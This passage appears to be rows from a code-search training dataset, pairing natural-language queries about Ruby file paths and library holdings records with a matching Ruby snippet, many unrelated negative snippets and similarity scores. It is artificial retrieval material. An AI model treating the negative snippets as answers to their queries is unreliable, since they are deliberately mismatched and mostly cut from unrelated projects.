'text')\")\r\n firstVal = \"\"\r\n if !@submission.send(attr[\"attribute\"]).nil? && @submission.send(attr[\"attribute\"]).any?\r\n firstVal = @submission.send(attr[\"attribute\"])[0]\r\n end\r\n input_html << text_field_tag(\"submission[#{attr[\"attribute\"].to_s}][]\", firstVal, :id => attr[\"attribute\"].to_s, class: \"metadataInput\")\r\n\r\n # Add field if list of metadata\r\n if !@submission.send(attr[\"attribute\"]).nil? && @submission.send(attr[\"attribute\"]).any?\r\n @submission.send(attr[\"attribute\"]).each_with_index do |metadata_val, index|\r\n if index != 0\r\n input_html << text_field_tag(\"submission[#{attr[\"attribute\"].to_s}][]\", metadata_val, :id => \"submission_#{attr[\"attribute\"].to_s}\", class: \"metadataInput\")\r\n end\r\n end\r\n end\r\n\r\n input_html << content_tag(:div, \"\", id: \"#{attr[\"attribute\"]}Div\")\r\n\r\n else\r\n # if single value text\r\n # TODO: For some reason @submission.send(\"URI\") FAILS... I don't know why... so I need to call it manually\r\n if attr[\"attribute\"].to_s.eql?(\"URI\")\r\n input_html << text_field(:submission, attr[\"attribute\"].to_s.to_sym, value: @submission.URI,class: \"metadataInput\")\r\n else\r\n input_html << text_field(:submission, attr[\"attribute\"].to_s.to_sym, value: @submission.send(attr[\"attribute\"]), class: \"metadataInput\")\r\n end\r\n end\r\n return input_html\r\n end\r\n end",
"def network_objects_add_dhcp_option(rule_name,data)\n\n dhcp_list = data.split(',')\n self.msg(rule_name, :debug, 'network_objects_add_dhcp_option', \"dhcp_list\" +dhcp_list.to_s)\n \n dhcp_list.each do |dhcp|\n \n self.msg(rule_name, :debug, 'network_objects_add_dhcp_option', \"processing dhcp_option\" +dhcp.to_s)\n \n @ff.link(:href, 'javascript:mimic_button(\\'add: ...\\', 1)').click\n @ff.select_list(:name, 'net_obj_type').select_value('64')\n \n if dhcp.size > 0\n \n dhcp_opts=dhcp.split(':')\n \n if dhcp_opts[0] == \"Vendor\"\n @ff.select_list(:name, 'dhcp_opt_code').select_value('60')\n end\n \n if dhcp_opts[0] == \"Client\"\n @ff.select_list(:name, 'dhcp_opt_code').select_value('61')\n end\n \n if dhcp_opts[0] == \"User\"\n @ff.select_list(:name, 'dhcp_opt_code').select_value('77')\n end\n \n self.msg(rule_name, :debug, 'network_objects_add_dhcp_option', \"set dhcp\" +dhcp)\n \n @ff.text_field(:name, 'dhcp_opt_type').set(dhcp_opts[1].to_s)\n @ff.link(:text, 'Apply').click\n \n end # end of if\n \n end # end of each\n \n end"
] |
[
"0.55089647",
"0.51406014",
"0.51390284",
"0.5078232",
"0.4972901",
"0.49673536",
"0.4945094",
"0.48930055",
"0.4880096",
"0.48542184",
"0.48444992",
"0.4839115",
"0.48358876",
"0.48354906",
"0.48238724",
"0.48172763",
"0.4780239",
"0.47694516",
"0.4758345",
"0.4750634",
"0.47319028",
"0.4724172",
"0.47027037",
"0.46952283",
"0.46867573",
"0.4651937",
"0.46218854",
"0.46003172",
"0.45883313",
"0.45612162",
"0.45537102",
"0.45430452",
"0.4542069",
"0.453476",
"0.45283204",
"0.45275894",
"0.451212",
"0.45066217",
"0.44943863",
"0.44940865",
"0.4491605",
"0.44784802",
"0.44566807",
"0.44556427",
"0.4453646",
"0.4445582",
"0.44423226",
"0.4433579",
"0.44318026",
"0.44292793",
"0.4423425",
"0.44226947",
"0.441768",
"0.44137186",
"0.4413404",
"0.44080296",
"0.44027176",
"0.43999386",
"0.43980384",
"0.43916506",
"0.4384465",
"0.43805704",
"0.43799916",
"0.43738696",
"0.43704253",
"0.436609",
"0.43632317",
"0.43613884",
"0.43613884",
"0.43613884",
"0.43516898",
"0.43503",
"0.43350762",
"0.433189",
"0.4327193",
"0.4325474",
"0.4322644",
"0.43183726",
"0.43177834",
"0.4315271",
"0.43143007",
"0.43090996",
"0.4291695",
"0.42825115",
"0.42797402",
"0.42640597",
"0.42491364",
"0.42449847",
"0.423911",
"0.42290208",
"0.42273173",
"0.42247915",
"0.4224698",
"0.4224602",
"0.4222526",
"0.42224467",
"0.42223445",
"0.42215887",
"0.42162183",
"0.421412"
] |
0.6419283
|
0
|
Creating function which will take the file path and return the absolute path for it.
|
def getPath(target)
File.expand_path(File.join(File.dirname(__FILE__), target))
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_absolute_path(file)\n File.expand_path file\nend",
"def abspath(file)\n File.absolute_path(file)\nend",
"def fullpath\n File.expand_path( @file )\n end",
"def file_path\n dir_name + file_name\n end",
"def f(path)\n File.dirname(__FILE__) + \"/\" + path\nend",
"def f(path)\n File.dirname(__FILE__) + \"/\" + path\nend",
"def normalized_path(file); end",
"def file_path\n File.dirname(__FILE__) + '/' + @file_name\n end",
"def file_path(filename)\n File.join(path, filename)\n end",
"def path\n \"%s/%s\" % [dirname, filename]\n end",
"def file_path\n end",
"def file_path\n File.join(dir,filename)\n end",
"def absolute_path(path)\n path = Pathname.new(path)\n return Pathname.new(@config.base_path) + path unless path.absolute?\n path\n end",
"def absolute(file)\n if File.directory?(full_path)\n File.join(full_path, file)\n else\n full_path\n end\n end",
"def fullpath; end",
"def file_path; end",
"def absolute_path\n if is_url?\n # Use the last path component without the query string plus the name\n # of the resource in Base64. This should be both mildly readable and\n # also unique per invocation.\n url_part = URI(path).path.split(/\\//).last\n base64_name = Base64.strict_encode64(name).gsub(/\\=/, '')\n ::File.join(Chef::Config[:file_cache_path], \"#{base64_name}_#{url_part}\")\n else\n ::File.expand_path(path, Chef::Config[:file_cache_path])\n end\n end",
"def path_to_file(path)\n File.new(self.absolute_path(path))\n end",
"def absolute_path(relative_path)\n quoted_string(File.expand_path(File.join(File.dirname(options[:filename]), relative_path.value)))\n end",
"def canonicalize\n FilePath.new(File.expand_path(to_s))\n end",
"def to_abs_path\n File.expand_path(self)\n end",
"def file_path=(_arg0); end",
"def path(input_filepath)\n\t\tPathname.new(input_filepath).expand_path\n\tend",
"def absolute_path(template_name)\n File.join(@base_path, \"#{template_name}.#{TEMPLATE_EXT}\")\n end",
"def file() = pathname.relative_path_from(Cnfs.config.paths.definitions)",
"def file_path\n FileUtils.mkdir_p @path unless Dir.exist? @path\n\n @path\n end",
"def project_file(fname)\n \"#{@project_path}/#{fname}\"\nend",
"def full_path\n File.join(@path, @name)\n end",
"def file(filename) File.read(File.absolute_path(filename, File.dirname($PROGRAM_NAME))) end",
"def full_file_path\n Rails.root.join('uploads', filepath).to_s\n end",
"def full_path\n path\n end",
"def fep(file)\n return File.expand_path(file)\n end",
"def full_path\n must_be File\n File.realpath(self.path)\n end",
"def full_path; end",
"def localFile(f)\n fileUri(File::absolute_path(f))\nend",
"def get_file_path\n @path\n end",
"def fullpath\n File.join(@root, @path)\n end",
"def full_path\n \"templates/#{filename}\"\n end",
"def to_absolute_path(file, dir_str)\n Pathname.new(file).absolute? ? file : File.expand_path(file, dir_str)\n end",
"def relative_path(path)\n path = File.expand_path(File.dirname(__FILE__) + '/' + path)\n \"'#{path}'\"\nend",
"def path_to_file(file)\n # return if we already have the full file path\n return file if File.exist?(file)\n path = importerexporter.parser.path_to_files\n f = File.join(path, file)\n return f if File.exist?(f)\n raise \"File #{f} does not exist\"\n end",
"def path_to_file(file)\n # return if we already have the full file path\n return file if File.exist?(file)\n path = importerexporter.parser.path_to_files\n f = File.join(path, file)\n return f if File.exist?(f)\n raise \"File #{f} does not exist\"\n end",
"def absolute_path(path, reference = @pwd)\n path = File.expand_path(File.join(reference, path)) unless path.start_with? '/'\n path\n end",
"def get_path(filename)\n\n Pathname(__FILE__).ascend{ |directory|\n path = directory + \"ansiblealexa.yml\"; break path if path.file?\n }\n\nend",
"def file_path path\n File.join(output_path, manifest.lookup(path).split('/')[2..-1])\n end",
"def full_path=(_arg0); end",
"def file_path\n @file_path ||= lookup_file_path\n end",
"def path\n return if @file.blank?\n if is_path?\n File.expand_path(@file)\n elsif @file.respond_to?(:path) && !@file.path.blank?\n File.expand_path(@file.path)\n end\n end",
"def getRealPath(path) Pathname.new(path).realpath.to_s; end",
"def getRealPath(path) Pathname.new(path).realpath.to_s; end",
"def relative_file_path(file_path)\n file_path.gsub(/#{pwd}\\//, '')\n end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def absolute_file_name(filename)\n File.expand_path(filename, @base_path)\n end",
"def file_path\n dir\n end",
"def abspath(path)\n Pathname.new(File.expand_path(path)).realpath.to_s\n end",
"def original_fullpath; end",
"def path\n @file.path\n end",
"def relative_path(from, to); end",
"def full_path\n container.root.join(path)\n end",
"def full_path\n container.root.join(path)\n end",
"def file\n File.join(root, FILENAME)\n end",
"def path\n @filename\n end",
"def /(path)\n ::File.join(self, path)\n end",
"def get_full_path(sub_path)\n File.join(Dir.pwd, sub_path)\nend",
"def local_file(file)\n File.join @cwd, file\n end",
"def user_file_path(file)\n path = \"#{Settings.source_dir}/#{file}\"\n ext = \".#{Settings.partials_extension}\"\n return path if path.end_with? ext\n\n \"#{path}#{ext}\"\n end",
"def file_path(file_name, target_name=file_name, mode=0600)\r\n _package_.build_file(target_name, file_name, mode)\r\n target_path target_name\r\n end",
"def file_root(path = '')\n File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..', path))\n end",
"def abs_filepath\n @epub.manifest.abs_path_from_id(@id)\n end",
"def relative_path_from(from); end",
"def to_absolute_path\n File.join('', to.path(:default).to_s)\n end",
"def path\n @path ||= Pathname.new(dir) + filename\n end",
"def file_path(attachment_name, style=nil, full=false)\n f = __send__(attachment_name)\n return nil if f.nil?\n fn = style.nil? ? f[:name] : \"#{attachment_name}.#{style}\"\n \"#{file_root(full)}/#{fn}\"\n end",
"def absolutepath\n if absolute?\n self\n elsif to_s == \".\"\n realpath\n else\n parent.absolutepath + self.basename\n end\n end",
"def file(at_path = nil)\n at_path ||= @full_path\n File.new at_path\n end",
"def file(at_path = nil)\n at_path ||= @full_path\n File.new at_path\n end",
"def path_of(path)\n File.join(self.path, path)\n end",
"def relative_to_absolute(path)\n if Pathname.new(path).absolute?\n Pathname.new(path)\n else\n Pathname.new(\"#{Pathname.pwd}/#{path}\")\n end\n end",
"def path\n self.file.to_s\n end",
"def file_path\n File.join(AssetMapper.assets_dir, filename)\n end",
"def full_path(path)\n if path.nil?\n '<unknown>'\n else\n begin\n File.expand_path(path)\n rescue\n '<unknown>'\n end\n end\n end",
"def expand_path file\n return File.expand_path(file) if file.start_with?(\"~/\")\n return file if file[0] == '/'\n\n return File.join(@current_dir, file)\nend",
"def path\n @file\n end",
"def path\n @file\n end",
"def build_path\n end",
"def relative_path\n must_be File\n Pathname.new(self.full_path).relative_path_from(Pathname.new(Dir.pwd)).to_s\n end",
"def root_file_path; end",
"def get_file_path(filename)\n # dir = File.realdirpath(File.join(File.dirname(__FILE__), '..', 'config'))\n File.join(@dir, filename)\n end",
"def to_file_path localhost: true\n raise \"no local path for non-local URI #{to_s}\" unless local?(localhost: localhost)\n path = scrub(@path)\n #path = path.gsub(SLASH, File::SEPARATOR)\n path\n end",
"def absolute_uri_path(path)\n \"#{root_uri}#{path}\"\n end",
"def file_name_with_path\n root_path.dup + file_name\n end",
"def path\n file.url\n end",
"def filepath_to_fullpath(filepath)\n _filepath = File.expand_path(filepath)\n _rootpath = File.expand_path(self.root_dir)\n\n fullpath = _filepath.gsub(File.join(_rootpath, '/'), '')\n\n fullpath.gsub!(/^\\.\\//, '')\n\n fullpath.split('.').first.dasherize\n end",
"def figure_path(file, paths)\n if Pathname.new(file).absolute?\n return File.exist?(file) ? file : nil\n end\n\n paths.each do |possible_path|\n full_path = File.join(possible_path, file)\n return full_path if File.exist?(full_path)\n end\n nil\n end",
"def read_file(absolute_path); end",
"def path\n @file.path\n end",
"def path()\n return ::File.join(@root, @name)\n end"
] |
[
"0.8412891",
"0.821072",
"0.7324445",
"0.73212904",
"0.7315222",
"0.7315222",
"0.7308162",
"0.7263403",
"0.7250167",
"0.7238373",
"0.7202978",
"0.7187968",
"0.7182794",
"0.71440583",
"0.7138835",
"0.7130809",
"0.7114592",
"0.70815",
"0.70579493",
"0.7031415",
"0.7028479",
"0.70229423",
"0.7002664",
"0.6986028",
"0.6985274",
"0.6965166",
"0.6950696",
"0.6917545",
"0.6912967",
"0.69104886",
"0.6898361",
"0.68877333",
"0.6873645",
"0.6864612",
"0.68530536",
"0.6823969",
"0.68162966",
"0.68112886",
"0.678486",
"0.6776483",
"0.6765044",
"0.6765044",
"0.676149",
"0.6745631",
"0.6734712",
"0.673081",
"0.6730093",
"0.67195547",
"0.66985184",
"0.66985184",
"0.6697317",
"0.6690366",
"0.6690366",
"0.6690366",
"0.6690366",
"0.6690366",
"0.6672974",
"0.667049",
"0.6659134",
"0.66472036",
"0.6638146",
"0.6632605",
"0.6627601",
"0.6627601",
"0.66203094",
"0.66166234",
"0.66091967",
"0.66066504",
"0.66018784",
"0.6599237",
"0.6582422",
"0.6578456",
"0.6576164",
"0.6553734",
"0.6551361",
"0.65480757",
"0.65423894",
"0.65376645",
"0.6529212",
"0.6529212",
"0.65241575",
"0.6517769",
"0.65172255",
"0.6510894",
"0.65041935",
"0.64970124",
"0.64945847",
"0.64909923",
"0.64885044",
"0.64863026",
"0.6484485",
"0.6479485",
"0.64713955",
"0.64689803",
"0.6462279",
"0.6458297",
"0.6456096",
"0.6454483",
"0.6450218",
"0.6450124",
"0.6444404"
] |
0.0
|
-1
|
Params: :number Fixnum The 1based sequential number representing the record's place under the bib record. (See lib/kuality_ole/data_objects/describe/marc_record.rb) :circulation_desk Object The OLE circulation desk to use. (See lib/kuality_ole/base_objects/etc/circulation_desk.rb) :call_number String The call number to use on the holdings record. :call_number_type String The holdings call number type. :location String The location for the holdings record. Defaults to a random selection from :circulation_desk. (See lib/kuality_ole/base_objects/etc/circulation_desk.rb)
|
def initialize(opts={})
defaults = {
:number => 1,
:circulation_desk => CirculationDesk.new,
:call_number => random_lcc,
:call_number_type => 'LCC',
:items => [ItemRecord.new]
}
@options = defaults.merge(opts)
# Select a Holdings location from the Circulation desk unless given.
@options[:location] ||= @options[:circulation_desk].locations.sample
set_opts_attribs(@options)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def callnumbers_from_945(record)\n callnumbers = []\n # Get the and b values to use as alternates\n # TODO: do we need to consider other fields (e.g. 099)?\n values_090ab = []\n x090ab = extract_marc(\"090ab\", :trim_punctuation => false)\n x090ab.call(record, values_090ab, nil)\n alternate_stem = values_090ab.join(\" \")\n # Process the callnumbers in the 945\n f945 = record.select {|f| f.tag == \"945\"}\n f945.each do |f|\n a = subfield_value(f, \"a\")\n b = subfield_value(f, \"b\")\n c = subfield_value(f, \"c\")\n g = subfield_value(f, \"g\")\n callnumber = build_callnumber(a, b, c, g, alternate_stem)\n if callnumber != \"\"\n callnumbers << callnumber\n end\n end\n callnumbers\nend",
"def call_number\n call['dispCallNumber'] || fields['dispCallNumber']\n end",
"def number_fetch(number)\n Number.new(number_request(:get, \"phone-numbers/#{number}\"))\n end",
"def initialize(number)\n @raw_number = number\n @number = CnPhoneNumber.clean(number)\n # assume okay until shown otherwise\n @reason = :ok\n #puts \"number = #{@number}\"\n\n # TODO too short or too long\n\n # let's determine the basic type: landline, mobile, magic, or unknown\n # source: TODO\n if CnPhoneNumber.is_magic_number?(@number)\n @type = :magic\n # a very basic length check: at least 7 digits, assuming no area or provider code\n elsif @number.length >= 7\n if @number[0] == '1'\n # at this point, it's either: Beijing's city code, OR ...\n if @number[1] == '0'\n @type = :landline\n # no known mobile providers have '19...'\n elsif @number[1] != '9'\n @type = :mobile\n else\n @type = :unknown\n end\n else\n @type = :landline\n end\n else\n @type = :unknown\n @reason = :unknown_type\n end\n #puts \"type = #{@type}\"\n\n if @type == :mobile\n # see if we can find a provider, and strip it from @number if found\n @provider = :unknown\n @provider_number = nil\n\n # all mobile numbers must be length 11. there are two cases:\n # a) 3 digit provider code + 8 digit local extension\n # b) 4 digit provider code (134X) + 7 digit local extension\n length_check_passed = @number.length == 11\n\n if length_check_passed\n Providers.all.each_pair do | area_code, provider |\n if @number[0, area_code.length] == area_code\n @provider = provider\n @provider_number = area_code\n @number = @number[area_code.length, @number.length]\n break\n end\n end\n end\n elsif @type == :landline\n # try to find the city, and strip it from @number if found\n @city = :unknown\n @city_number = nil\n Provinces.all.each_pair do | area_code, city |\n #puts area_code, city, @number[0, area_code.length]\n # all landline numbers must be >= length 7 (minus the provider code)\n if @number[0, area_code.length] == area_code && @number.length - area_code.length >= 7\n @city = city\n @city_number = area_code\n @number = @number[area_code.length, @number.length]\n break\n end\n end\n else\n @provider = :unknown\n @provider_number = nil\n @city = :unknown\n @city_number = nil\n end\n\n end",
"def new\n @call_num = CallNum.new\n @book = Book.find(params[:book_id])\n @call_nums = CallNum.find(:all, :conditions => ['book_id = ?', @book])\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @call_num }\n end\n end",
"def get_contact_by_number(contact_number)\n get_contact(nil, contact_number)\n end",
"def get_contact_by_number(contact_number)\n get_contact(nil, contact_number)\n end",
"def book_with_number(number)\n response = request(:book_with_number, {\n \"currentInvoiceHandle\" => handle.to_hash,\n \"number\" => number\n })\n\n # Find the created Invoice\n session.invoices.find(response[:number])\n end",
"def render_call_number args, results = Array.new\n locations = [\"rx\", \"rhlrr\", \"rharr\", \"rhs2\", \"rhs2o\", \"rhs3\"]\n if args[:document][\"marc_display\"]\n MARC::XMLReader.new(StringIO.new(args[:document][\"marc_display\"])).first.find_all {|f| f.tag == '945'}.each do |field|\n results << field['a'] if locations.include?(field['l'].strip)\n end\n end\n return results.join(field_value_separator).html_safe\n end",
"def get_record(bibnumber)\n if record_exists?(bibnumber)\n marc_url = URI_FOR_MARC % ([@scope] + Array.new(3, bibnumber))\n record_url = URI_FOR_RECORD % [bibnumber, @scope]\n \n # Retrieve MARC data and convert to UTF-8 prior to decoding ...\n record_page = get_page(marc_url)\n record_data = MARC_REGEX.match(record_page)\n \n if record_data.nil?\n raise ParserError, \"Could not decode data: MARC data not found.\"\n else\n record_data = record_data[1].strip()\n record_data = Iconv.conv('UTF-8', 'LATIN1', record_data)\n end\n\n record = decode_pseudo_marc(record_data)\n unless record.nil?\n record.bibnum = bibnumber\n record.raw = record_data\n record.record_url = \"#{self.class.base_uri}#{record_url}\"\n record.marc_url = \"#{self.class.base_uri}#{marc_url}\"\n end\n return record\n else\n raise NonExistentRecordError, \"Record not found.\"\n end\n rescue NonExistentRecordError => error\n warn error.message\n return nil\n rescue ParserError => error \n warn error.message\n return nil\n end",
"def add_number\n return unless %w[techreport manual].include? @bib.type\n\n did = @bib.docidentifier.detect { |i| i.primary == true }\n did ||= @bib.docidentifier.first\n @item.number = did.id if did\n end",
"def create\n @number = Number.new(number_params)\n\n if !@number.business_number.blank?\n @number.business_number = \"+1\"+Phony.normalize(@number.business_number) \n end\n\n begin \n @client = Twilio::REST::Client.new BwCallTracking::Application.config.account_sid, BwCallTracking::Application.config.auth_token \n number = @client.account.incoming_phone_numbers.create(:area_code => @number.area_code[1..3], :voice_url => BwCallTracking::Application.config.voice_url, :status_callback => BwCallTracking::Application.config.voice_url)\n @number.tracking_number = number.phone_number\n rescue StandardError => e\n puts \"ERROR: \"+e.message \n end \n\n respond_to do |format|\n if @number.save\n format.html { redirect_to numbers_url, notice: 'Number was successfully created.' }\n format.json { render :show, status: :created, location: @number }\n else\n format.html { render :new }\n format.json { render json: @number.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @number = Number.new(number_params)\n\n if !@number.business_number.blank?\n @number.business_number = \"+1\"+Phony.normalize(@number.business_number) \n end\n\n begin \n\n numbers = Bandwidth::AvailableNumber.search_local({:area_code => @number.area_code[1..3]})\n \n if numbers.count > 0\n # buy the phone number\n number = Bandwidth::PhoneNumber.create({:number => numbers[0][:number], :applicationId => ENV[\"BANDWIDTH_APP_ID\"]})\n\n # assign the phone number to your app id\n @number.tracking_number = number.number\n @number.bw_id = number.id\n \n end\n\n rescue StandardError => e\n puts \"ERROR: \"+e.message\n raise \"There was a problem setting up your number. Try again.\" \n end \n\n respond_to do |format|\n if @number.save\n format.html { redirect_to numbers_url, notice: 'Number was successfully created.' }\n format.json { render :show, status: :created, location: @number }\n else\n format.html { render :new }\n format.json { render json: @number.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @number_call = NumberCall.new(params[:number_call])\n\n respond_to do |format|\n if @number_call.save\n format.html { redirect_to @number_call, notice: 'Number call was successfully created.' }\n format.json { render json: @number_call, status: :created, location: @number_call }\n else\n format.html { render action: \"new\" }\n format.json { render json: @number_call.errors, status: :unprocessable_entity }\n end\n end\n end",
"def render_call_number args, results = Array.new\n locations = [\"rx\", \"rhlrr\", \"rharr\", \"rhs2\", \"rhs2o\", \"rhs3\"]\n if args[:document][\"marc_ss\"]\n MARC::XMLReader.new(StringIO.new(args[:document][\"marc_ss\"])).first.find_all {|f| f.tag == '945'}.each do |field|\n results << field['a'] if locations.include?(field['l'].strip)\n end\n end\n return results.join(field_value_separator).html_safe\n end",
"def create\n @call_num = CallNum.new(params[:call_num])\n\n respond_to do |format|\n if @call_num.save\n flash[:success] = 'Call number was successfully created.'\n format.html { redirect_to add_details_path }\n format.xml { render :xml => @call_num, :status => :created, :location => @call_num }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @call_num.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def dialNumber\n\t\tprint countryCode\n\t\tprint cityCode\n\t\tprint phoneNumber\n\tend",
"def place_recall_for(record, pickup_location_id, comment)\n recalled = false\n expire_time = (Date.today >> 1).to_time\n expire_date = \"#{expire_time.year}#{(\"%02d\" % expire_time.month)}#{(\"%02d\" % expire_time.day)}\"\n comment = CGI::escapeHTML(comment)\n \n xml = '<?xml version=\"1.0\" encoding=\"UTF-8\"?>'\n xml += '<recall-parameters>'\n xml += \"<pickup-location>#{pickup_location_id}</pickup-location>\"\n xml += \"<last-interest-date>#{expire_date}</last-interest-date>\"\n xml += \"<dbkey>#{$libraries[record.library][\"db_key\"]}</dbkey>\"\n xml += \"<comment>#{comment}</comment>\" \n xml += '</recall-parameters>'\n \n recallable_item = record.items.reduce(nil) do |recallable_item, item|\n item.actions.reduce(recallable_item) do |recallable_item, action|\n unless recallable_item\n recallable_item = item if action.name == \"Recall\" and action.allowed\n recallable_item\n end\n recallable_item\n end\n end\n \n recall_url = \"#{recallable_item.resource_url}/recall?patron=#{self.voyager_identifier}&patron_homedb=#{self.home_db}\"\n uri = URI.parse(recall_url)\n Net::HTTP.start(uri.host, uri.port) do |http|\n headers = {'Content-Type' => 'text/xml'}\n response = http.send_request('PUT', uri.request_uri, xml, headers)\n request_info = Crack::XML.parse(response.body)\n recalled = true if request_info[\"response\"][\"reply_code\"] == \"0\"\n end\n recalled\n end",
"def set_number_record\n @number_record = NumberRecord.find(params[:id])\n end",
"def initialize(call_number)\n @call_number = call_number\n end",
"def show\n @number_call = NumberCall.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @number_call }\n end\n end",
"def new\n @number_call = NumberCall.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @number_call }\n end\n end",
"def load_marc_record\n @@sierra_api = SierraApi.new unless @@sierra_api\n\n marc_record = @@sierra_api.bibs(id: @bibnumber)\n\n relavent_tags = ['245', '500', '511', '520', '521', '546']\n\n tags = {}\n marc_record.each do |i|\n tag = i['tag']\n if relavent_tags.include?(tag)\n tags[tag] = {} unless tags.key?(tag)\n\n i['data']['subfields'].each do |j|\n code = j['code']\n if tags[tag].key?(code)\n tags[tag][code] << ' ' + j['data']\n else\n tags[tag][code] = j['data']\n end\n end\n end\n end\n #pp tags\n\n # Extract fields.\n @title = tags['245']['a'].gsub(' /', '') if defined?(tags['245']['a'])\n @summary = tags['520']['a'] if defined?(tags['520']['a'])\n @cast = tags['511']['a'] if defined?(tags['511']['a'])\n @language = tags['546']['a'] if defined?(tags['546']['a'])\n @rating = tags['521']['a'] if defined?(tags['521']['a'])\n\n if tags.key?('500')\n note = tags['500'].values.join(' ')\n if match = /\\d{4}/.match(note)\n @year = match[0] if match.length == 1\n end\n end\n\n end",
"def bib_number\n get_id_from_lane_assignment(competition, heat, lane) || 0\n end",
"def place_call\n client = Twilio::REST::Client.new(Settings.twilio.account_sid, Settings.twilio.auth_token)\n params = {\n from: call.caller_id,\n to: call.member_phone_number,\n url: call_start_url(call),\n status_callback: member_call_event_url(call),\n status_callback_method: 'POST',\n status_callback_event: %w[initiated ringing answered completed]\n }\n client.calls.create params\n rescue Twilio::REST::RestError => e\n # 13223: Dial: Invalid phone number format\n # 13224: Dial: Invalid phone number\n # 13225: Dial: Forbidden phone number\n # 13226: Dial: Invalid country code\n # 21211: Invalid 'To' Phone Number\n # 21214: 'To' phone number cannot be reached\n call.action.destroy!\n call.update!(twilio_error_code: e.code, status: 'failed', action_id: nil)\n if (e.code >= 13_223 && e.code <= 13_226) || [21_211, 21_214].include?(e.code)\n add_error(:member_phone_number, I18n.t('call_tool.errors.phone_number.cant_connect'))\n else\n Rails.logger.error(\"Twilio Error: API responded with code #{e.code} for #{call.attributes.inspect}\")\n add_error(:base, I18n.t('call_tool.errors.unknown'))\n end\n end",
"def query_ol(column:, call_number:)\n result = postgres_adapter.execute(query: bib_query(column: column, call_num: call_number))\n return [] if result.empty?\n if result.first[\"title\"].match?(/^[\\d]+ titles with this call number$/)\n logger.info \" trying ol\"\n bib_numbers = query_ol_api(call_number: call_number)\n else\n bib_numbers = result.map { |h| h[\"bibid\"] }.uniq\n end\n bib_numbers\n end",
"def get_credit_note(credit_note_id_or_number)\n request_params = {}\n\n url = \"#{@xero_url}/CreditNotes/#{CGI.escape(credit_note_id_or_number)}\"\n\n response_xml = http_get(@client, url, request_params)\n\n parse_response(response_xml, {:request_params => request_params}, {:request_signature => 'GET/CreditNote'})\n end",
"def ref_number\n batch = check.batch\n facility_name = facility.name.upcase\n if (facility_name == 'AHN' || facility_name == 'SUBURBAN HEALTH' ||\n facility_name == 'UWL' || facility_name == 'ANTHEM')\n file_number = batch.file_name.split('_')[0][3..-1] rescue \"0\"\n date = batch.date.strftime(\"%Y%m%d\")\n \"#{date}_#{file_number}\"\n else\n (batch.batchid.include?(\"AH\") ? batch.batchid : batch.date.strftime(\"%Y%m%d\"))\n end\n end",
"def add_loan\n @number = params[:number]\n @loan_form_number = params[:loan_form_number]\n @delete_number = (@number.to_i - 1).to_s\n end",
"def initialize(bibnumber)\n @bibnumber = bibnumber\n\n load_marc_record\n # get_poster_url if @title and whatever other fields we need to do the search\n end",
"def set_number\n @number = Number.find(params[:id])\n end",
"def set_number\n @number = Number.find(params[:id])\n end",
"def set_number\n @number = Number.find(params[:id])\n end",
"def set_number\n @number = Number.find(params[:id])\n end",
"def set_number\n @number = Number.find(params[:id])\n end",
"def set_number\n @number = Number.find(params[:id])\n end",
"def write_number(crl_number)\n @db.execute('UPDATE crl_number SET number=?', crl_number)\n end",
"def ref_number\n if ['AHN', 'SUBURBAN HEALTH', 'UWL', 'ANTHEM'].include?(@facility_name)\n file_number = @batch.file_name.split('_')[0][3..-1] rescue \"0\"\n date = @batch.date.strftime(\"%Y%m%d\")\n \"#{date}_#{file_number}\"\n else\n (@batch.batchid.include?(\"AH\") ? @batch.batchid : @batch.date.strftime(\"%Y%m%d\"))\n end\n end",
"def find_by_number(number)\n response = session.request entity_class.soap_action('FindByNumber') do\n soap.body = {\n 'number' => number\n }\n end\n\n if response == {}\n nil\n else\n debtor = build\n debtor.partial = true\n debtor.persisted = true\n debtor.handle = response\n debtor.number = response[:number].to_i\n debtor\n end\n end",
"def set_call_detail\n @call_detail = CallDetail.find(params[:id])\n end",
"def create\n @call = Call.new(call_params)\n @call.client = ClientPhone.find_by(phone: @call.phone).try(:client)\n @call.internal = Internal.find(params[:call][:internal_id])\n @call.call_type = CallType.find(params[:call][:call_type_id])\n\n respond_to do |format|\n if @call.save\n format.html { redirect_to @call, notice: 'Call was successfully created.' }\n format.json { render status: :ok, json: @call }\n else\n format.html { render :new }\n format.json { render json: @call.errors, status: :unprocessable_entity }\n end\n end\n end",
"def by_call_record_id(call_record_id)\n raise StandardError, 'call_record_id cannot be null' if call_record_id.nil?\n url_tpl_params = @path_parameters.clone\n url_tpl_params[\"callRecord%2Did\"] = call_record_id\n return MicrosoftGraph::Communications::CallRecords::Item::CallRecordItemRequestBuilder.new(url_tpl_params, @request_adapter)\n end",
"def create\n @number_record = NumberRecord.new(number_record_params)\n\n respond_to do |format|\n if @number_record.save\n format.html { redirect_to number_records_path, notice: 'Number record was successfully created.' }\n format.json { render :show, status: :created, location: @number_record }\n else\n format.html { render :new }\n format.json { render json: @number_record.errors, status: :unprocessable_entity }\n end\n end\n end",
"def make_call (number, international_code = 1, area_code = 646)\n puts \"Calling #{international_code}-#{area_code}-#{number}\"\n end",
"def initialize(call_number, text, note)\n @call_number = call_number\n @text = format_text(text)\n add_brackets = @call_number.present? || @text.present?\n @note = format_note(note, add_brackets)\n end",
"def WorldCatCheckControlNumbers(opts={})\n sRecord = \"\"\n @LastResponseCode = \"\"\n base_uri = WORLDCAT_METADATA_CHECK_CONTROL_NUMBERS_URI\n helper = Helper.new(:wskey => @wskey, :secret => @secret, :principalID=>@principalID, :principalDNS => @principalDNS)\n\n base_uri += \"?oclcNumbers=\" + opts[:oclcNumber]\n response = helper.MakeHTTPRequest(:url => base_uri, :method => \"GET\", :accept => \"application/atom+json\")\n @debug_info = helper.debug_string + \"\\n\\n\" + base_uri\n @LastResponseCode = response\n sRecord = response\n return sRecord\n end",
